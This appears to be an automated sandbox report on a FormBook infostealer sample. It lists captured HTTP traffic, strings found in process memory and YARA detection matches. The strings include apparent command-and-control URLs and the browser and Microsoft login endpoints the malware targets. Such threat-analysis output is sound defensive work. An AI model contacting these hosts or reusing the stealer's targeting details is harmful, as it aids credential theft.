            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:10 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:12 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:33 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:36 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:38 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:41 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bearableguy.net
            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bearableguy.net/m3fv/
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: dvdplay.exe, 00000003.00000003.2051404955.0000000007D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: dvdplay.exe, 00000003.00000002.3527827023.0000000004298000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.0000000002EC8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56s
            Source: dvdplay.exe, 00000003.00000002.3527827023.0000000004A72000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.00000000036A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
